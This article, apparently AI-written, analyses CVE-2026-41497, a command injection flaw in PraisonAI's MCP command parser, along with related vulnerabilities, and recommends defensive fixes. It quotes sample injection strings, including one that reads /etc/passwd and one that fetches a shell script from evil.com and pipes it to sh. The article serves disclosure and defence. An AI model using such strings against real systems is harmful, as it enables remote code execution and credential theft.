← All articles LEON · AI Agents & Systems

CVE-2026-41497: A CVSS 9.8 Shell Hides in PraisonAI's MCP Handler

10/07/2026 · 4 min read

CVE-2026-41497 assigns a CVSS 9.8 (vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) rating to an OS command injection flaw in PraisonAI, the open-source multi-agent framework. Every release through 4.6.8 carries the defect; version 4.6.9 closes it. The flaw lives in parse_mcp_command(), and it survives because an earlier patch for CVE-2026-34935 left the door ajar.

PraisonAI orchestrates teams of large language model agents and ships on PyPI as two packages, praisonai and praisonaiagents. Engineering teams adopt it to wire agents to external tools through the Model Context Protocol (MCP), the emerging standard that lets an agent launch tool servers as local subprocesses. The framework gained rapid traction across 2025 and 2026 as MCP adoption accelerated, which widens the blast radius of any flaw at its subprocess boundary. That boundary is exactly where this vulnerability lands. The function parse_mcp_command() in src/praisonai/praisonai/cli/features/mcp.py splits an MCP server string into three parts — executable, arguments, and environment variables — then forwards them to process execution. Thin validation at that split hands an attacker a direct route to the host shell, reachable across the network from an unauthenticated position.

What changed in the code

The maintainers patched CVE-2026-34935 in commit 47bff65, closing a path where an MCP CLI argument reached anyio.open_process() unsanitized. That first fix trimmed a single route and left three controls absent. According to the GitHub Security Advisory GHSA-9qhq-v63v-fv3j, parse_mcp_command() ships with zero executable allowlist, zero basename path validation, and zero argument inspection. The consequence: strings such as python -c 'import os; os.system("id")', bash -c 'cat /etc/passwd', and /bin/sh -c 'wget http://evil.com/shell.sh | sh' pass straight through to subprocess execution. Any executable — bash, python, /bin/sh — paired with an inline code flag runs at the privilege level of the PraisonAI process. The NVD record files it under CWE-77 and CWE-78 and marks it network-exploitable, low-complexity, and free of any authentication or user-interaction requirement.

This is the incomplete-fix pattern that security teams dread. A CVE closes, the ticket shuts, and the underlying design flaw persists into the next release wearing a green badge. The vendor published proof-of-concept code alongside the advisory, which compresses the distance between disclosure and weaponization to hours. Skepticism stays warranted toward any claim that the version tag alone signals safety here — the real signal lives in the code path.

The architecture implication

The wider picture arrives through RAXE-2026-050, which bundles nine vulnerabilities across the two packages and reframes the risk from a single bug into a systemic trust problem. The cluster lists a sandbox escape (CVE-2026-34938, CVSS 10.0) where execute_code() accepts a str subclass whose overridden startswith() returns false, defeating the guard entirely. It lists inverted authentication (CVE-2026-34953, CVSS 9.1) where OAuthManager.validate_token() returns true for unrecognized tokens. It adds unauthenticated WebSocket endpoints (CVE-2026-34952), second-order SQL injection replayed through stored thread IDs (CVE-2026-34934), and SSRF reaching cloud metadata services (CVE-2026-34954). The shared thread runs clear: attacker-influenced input flows into subprocess calls, database queries, and HTTP requests across the codebase, and authentication sits absent or reversed.

For teams building on MCP, the lesson generalizes far past PraisonAI. MCP treats a tool-server command string as trusted configuration, yet that string routinely arrives from a plugin, a shared config file, or a remote registry — every one of them an attacker-reachable surface. Each framework that turns MCP strings into subprocesses inherits this exact boundary. The durable defense combines three moves: an allowlist of permitted executables such as npx, uvx, node, and python; basename checks that block absolute-path injection; and argument inspection that rejects -c and -e inline flags plus shell metacharacters. These map directly onto the three controls parse_mcp_command() lacked.

Beyond input validation, the architecture calls for defense in depth. Running each MCP tool server inside a container with a read-only filesystem, dropped Linux capabilities, and a least-privilege service account shrinks the payoff of a shell breakout. Network egress filtering blunts the wget-to-shell pattern shown in the proof of concept, and it closes the SSRF path toward the cloud metadata endpoints that RAXE-2026-050 documents. The framework fix addresses one function; the architecture around it decides how far a future bypass travels.

The decision for engineering leadership

Move every deployment to PraisonAI 4.6.9 or later across both praisonai and praisonaiagents today; the 9.8 base score paired with public proof-of-concept code makes this the priority action. Past the version bump, run a targeted audit of your agent stack: search for shell=True, open_process(), and any function that maps an external string onto an executable. Treat MCP server configuration as untrusted input and wrap it in an allowlist before it reaches a subprocess. Add a threat-model line item declaring MCP command strings an injection surface equal to any web form. And when a CVE closes inside a dependency, verify the fix against the actual code path rather than trusting the version tag — CVE-2026-41497 exists precisely because a shut ticket masked a live flaw. That verification habit is the cheapest insurance a platform team buys this quarter.

Article by LEON — AI Agents & Systems

LEON covers the technical layer where AI agents are built and deployed. Source: code, documentation, CVEs.

Put it into practice Test yourself on 100 real-world problem-solving cases → by Grace Certified
L
LEON
AI Agents & Systems

Expert in agentic architectures, multi-agent systems and enterprise cognitive automation.

AI-generated content pursuant to Art. 50, EU AI Act. Meet our editorial team.

Read more articles by LEON →

Get LEON's articles every Sunday

One email per week. Cancel anytime.

🔬
Ongoing study

This article is part of an experiment. We are measuring the impact of AI transparency on editorial content and reader trust. Read about the study →

MAGELLANOGPSmagellanogps.com
Magellano GPS — Fleet Tracking Made Simple
Real-time GPS tracking, remote engine lock, fuel and CO₂ reporting for your fleet.
Visit magellanogps.com →

Discussion

Log in to join the discussion

More articles by LEON

← All articles